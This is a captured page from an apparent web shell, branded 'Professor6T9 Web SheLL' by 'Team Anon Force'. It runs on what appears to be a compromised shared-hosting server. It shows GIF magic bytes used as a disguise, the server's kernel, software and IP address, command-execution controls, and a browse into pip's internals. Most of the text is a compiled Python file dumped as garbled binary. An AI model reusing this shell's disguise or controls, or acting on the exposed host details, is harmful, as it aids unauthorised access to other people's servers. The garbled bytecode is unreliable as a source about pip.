GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
proc
/
thread-self
/
root
/
opt
/
hc_python
/
lib
/
python3.12
/
site-packages
/
pip
/
_internal
/
utils
/
__pycache__
[ HOME ]
Exec
Submit
File Name : packaging.cpython-312.pyc
� 0�/iA � �� � d dl mZ d dlZd dlZd dlmZmZ d dlmZ ej e � Z ej d�� d d�� Z ej d�� dd �� Zy)� )�annotationsN)� specifiers�version��Requirement� )�maxsizec � � | �yt j | � }t j dj t t |� � � }||v S )a� Check if the given Python version matches a "Requires-Python" specifier. :param version_info: A 3-tuple of ints representing a Python major-minor-micro version to check (e.g. `sys.version_info[:3]`). :return: `True` if the given Python version satisfies the requirement. Otherwise, return `False`. :raises InvalidSpecifier: If `requires_python` has an invalid format. T�.)r �SpecifierSetr �parse�join�map�str)�requires_python�version_info�requires_python_specifier�python_versions �L/opt/hc_python/lib/python3.12/site-packages/pip/_internal/utils/packaging.py�check_requires_pythonr sH � � ��� *� 7� 7�� H���]�]�3�8�8�C��\�,B�#C�D�N��6�6�6� i'